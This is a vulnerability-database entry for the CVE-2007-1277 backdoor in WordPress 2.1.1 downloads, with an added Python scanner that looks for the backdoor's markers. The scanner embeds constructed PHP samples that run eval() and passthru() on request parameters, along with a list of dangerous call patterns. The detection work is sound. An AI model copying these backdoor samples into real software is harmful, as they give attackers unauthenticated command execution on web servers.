Vulnerability Name: | CVE-2007-1277 (CCN-32804)
Assigned: | 2007-03-02
Published: | 2007-03-02
Updated: | 2018-10-16
Summary: | WordPress 2.1.1, as downloaded from some official distribution sites during February and March 2007, contains an externally introduced backdoor that allows remote attackers to execute arbitrary commands via (1) an eval injection vulnerability in the ix parameter to wp-includes/feed.php, and (2) a passthru() call on the untrusted iz parameter to wp-includes/theme.php. The backdoor was added to the download files, not to the 2.1.1 release as written, so only copies fetched from the affected distribution sites in that window carry it, and the version string alone does not tell a clean 2.1.1 from a backdoored one. This vulnerability is addressed in the following product update: http://wordpress.org/development/2007/03/upgrade-212/
CVSS v3 Severity: | 7.3 High (CCN CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)
CVSS v2 Severity: | 7.5 High (CVSS v2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P)
                  | 5.5 Medium (Temporal CVSS v2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P/E:U/RL:OF/RC:C)
                  | 5.5 Medium (CCN Temporal CVSS v2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P/E:U/RL:OF/RC:C)
Vulnerability Type: | CWE-20
Vulnerability Consequences: | Gain Access
References: |
  - MITRE (CNA): CVE-2007-1277
  - MISC (Exploit): http://ifsec.blogspot.com/2007/03/wordpress-code-compromised-to-enable.html
  - CCN: SA24374 WordPress Command Execution and PHP "eval()" Injection
  - SECUNIA (Vendor Advisory): 24374
  - CCN: WordPress Web site, WordPress
  - CCN: WordPress Blog, March 2, 2007, WORDPRESS 2.1.1 DANGEROUS, UPGRADE
  - CONFIRM (Vendor Advisory): http://wordpress.org/development/2007/03/upgrade-212/
  - CCN: US-CERT VU#214480 WordPress fails to properly sanitize input passed to the ix parameter in wp-includes/feed.php
  - CERT-VN (US Government Resource): VU#214480
  - CCN: US-CERT VU#641456 WordPress fails to properly sanitize input passed to the iz parameter in wp-includes/theme.php
  - CERT-VN (US Government Resource): VU#641456
  - BUGTRAQ: 20070303 WordPress source code compromised to enable remote code execution
  - BID: 22797
  - CCN: BID-22797 Wordpress 2.1.1 Command Execution Backdoor Vulnerability
  - CCN: BID-23321 Microsoft Windows Explorer BMP Image Denial of Service Vulnerability
  - VUPEN: ADV-2007-0812
  - XF: wordpress-feed-code-execution(32804)
  - XF: wordpress-theme-command-execution(32807)
Vulnerable Configuration: | Configuration 1:
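The summary above names the two files and request parameters the backdoor abused, and the CCN-32807 record that follows describes the theme.php half again. The scanner below is an added example, not code from this page or from WordPress: it checks a WordPress tree for exactly those markers, reads of the ix and iz request parameters and eval()/passthru()-style calls in wp-includes/feed.php and wp-includes/theme.php, and reports the installed version. Everything beyond the advisory's own facts is an assumption: the PHP samples are constructed stand-ins shaped like the described backdoor (the helper names and bodies are invented, not the real injected code), and the version check assumes WordPress stores $wp_version in wp-includes/version.php.

```python
"""Scan a WordPress tree for the CVE-2007-1277 backdoor markers.

Added example, not code from the page or from WordPress. Detection rests
only on what the advisory states: eval() on the 'ix' request parameter in
wp-includes/feed.php and passthru() on the 'iz' parameter in
wp-includes/theme.php. The PHP samples are constructed stand-ins.
"""
import os
import re
import tempfile
from typing import Dict, List, Optional

# File named in the advisory -> request parameter the backdoor read from it.
SUSPECT_FILES = {"wp-includes/feed.php": "ix", "wp-includes/theme.php": "iz"}

# Neither file has a legitimate reason to run code or shell commands, so any
# of these calls is suspicious regardless of which parameter feeds it.
DANGEROUS_CALLS = re.compile(
    r"\b(eval|passthru|system|shell_exec|exec|popen|proc_open)\s*\(", re.I)

# Assumption: WordPress records its version as $wp_version in wp-includes/version.php.
VERSION_RE = re.compile(r"\$wp_version\s*=\s*['\"]([^'\"]+)['\"]")


def scan_source(relpath: str, source: str) -> List[str]:
    """Findings for one file's PHP source; an empty list means nothing matched."""
    findings: List[str] = []
    param = SUSPECT_FILES.get(relpath)
    if param is None:
        return findings  # only the two files from the advisory are examined
    # $_GET['ix'], $_REQUEST["ix"], $_POST[ 'ix' ] and similar spellings
    param_re = re.compile(r"\$_(GET|POST|REQUEST)\s*\[\s*['\"]"
                          + re.escape(param) + r"['\"]\s*\]")
    for lineno, line in enumerate(source.splitlines(), 1):
        stripped = line.strip()
        if stripped.startswith(("//", "#", "*")):
            continue  # comment-only line; the hits that matter are executable
        if param_re.search(line):
            findings.append(f"{relpath}:{lineno}: reads request parameter '{param}'")
        if DANGEROUS_CALLS.search(line):
            findings.append(f"{relpath}:{lineno}: dangerous call: {stripped[:60]}")
    return findings


def scan_tree(root: str) -> Dict[str, List[str]]:
    """Scan an on-disk install rooted at `root`: {relative path: findings}."""
    results: Dict[str, List[str]] = {}
    for relpath in SUSPECT_FILES:
        full = os.path.join(root, *relpath.split("/"))
        if os.path.isfile(full):
            with open(full, encoding="utf-8", errors="replace") as fh:
                results[relpath] = scan_source(relpath, fh.read())
    return results


def installed_version(root: str) -> Optional[str]:
    """Version from wp-includes/version.php, or None. A clean and a backdoored
    2.1.1 report the same string, so this only places the install in range."""
    path = os.path.join(root, "wp-includes", "version.php")
    if not os.path.isfile(path):
        return None
    with open(path, encoding="utf-8", errors="replace") as fh:
        m = VERSION_RE.search(fh.read())
    return m.group(1) if m else None


# Constructed samples (not WordPress code): a harmless fragment, and the same
# fragment with a backdoor shaped like the one the advisory describes.
CLEAN_FEED = """<?php
function rss_title($t) { return strip_tags($t); }
"""
BACKDOORED_FEED = CLEAN_FEED + """
function feed_filter_helper($data) {
    eval($data);  // stand-in for the reported eval() backdoor
}
if ($_GET["ix"]) { feed_filter_helper($_GET["ix"]); }
"""
CLEAN_THEME = """<?php
function theme_dir() { return ABSPATH . 'wp-content/themes'; }
"""
BACKDOORED_THEME = CLEAN_THEME + """
function theme_cmd_helper($cmd) {
    passthru($cmd);  // stand-in for the reported passthru() backdoor
}
if ($_GET["iz"]) { theme_cmd_helper($_GET["iz"]); }
"""


def demo() -> Dict[str, List[str]]:
    """Write the backdoored samples into a temporary tree and scan it."""
    with tempfile.TemporaryDirectory() as root:
        inc = os.path.join(root, "wp-includes")
        os.makedirs(inc)
        for name, body in (("feed.php", BACKDOORED_FEED),
                           ("theme.php", BACKDOORED_THEME),
                           ("version.php", "<?php\n$wp_version = '2.1.1';\n")):
            with open(os.path.join(inc, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        results = scan_tree(root)
        results["version"] = [installed_version(root) or "unknown"]
    return results
```

Point scan_tree() at the web root of any 2.1.1 install fetched in the affected window. A reported version of 2.1.1 only says the install is in range; the file findings are what decide, since the backdoor left the version untouched. Any hit is reason to treat the host as compromised rather than merely out of date: the backdoor gave unauthenticated remote command execution as the web server user, so upgrading to 2.1.2 closes the door but does not undo anything that came through it.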
Vulnerability Name: | CVE-2007-1277 (CCN-32807)
Assigned: | 2007-03-02
Published: | 2007-03-02
Updated: | 2007-03-02
Summary: | WordPress could allow a remote attacker to execute arbitrary commands on the system, caused by improper validation of user-supplied input by the theme.php script. A remote attacker could send a specially-crafted request to the theme.php script using the iz parameter to inject and execute malicious shell commands with the privileges of the Web server.
CVSS v3 Severity: | 7.3 High (CCN CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)
CVSS v2 Severity: | 7.5 High (CVSS v2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P)
                  | 5.5 Medium (Temporal CVSS v2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P/E:U/RL:OF/RC:C)
                  | 5.5 Medium (CCN Temporal CVSS v2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P/E:U/RL:OF/RC:C)
Vulnerability Consequences: | Gain Access
References: |
  - MITRE (CNA): CVE-2007-1277
  - CCN: SA24374 WordPress Command Execution and PHP "eval()" Injection
  - CCN: WordPress Web site, WordPress
  - CCN: WordPress Blog, March 2, 2007, WORDPRESS 2.1.1 DANGEROUS, UPGRADE
  - CCN: US-CERT VU#214480 WordPress fails to properly sanitize input passed to the ix parameter in wp-includes/feed.php
  - CCN: US-CERT VU#641456 WordPress fails to properly sanitize input passed to the iz parameter in wp-includes/theme.php
  - CCN: BID-22797 Wordpress 2.1.1 Command Execution Backdoor Vulnerability
  - XF: wordpress-theme-command-execution(32807)
Vulnerable Configuration: | Configuration CCN 1: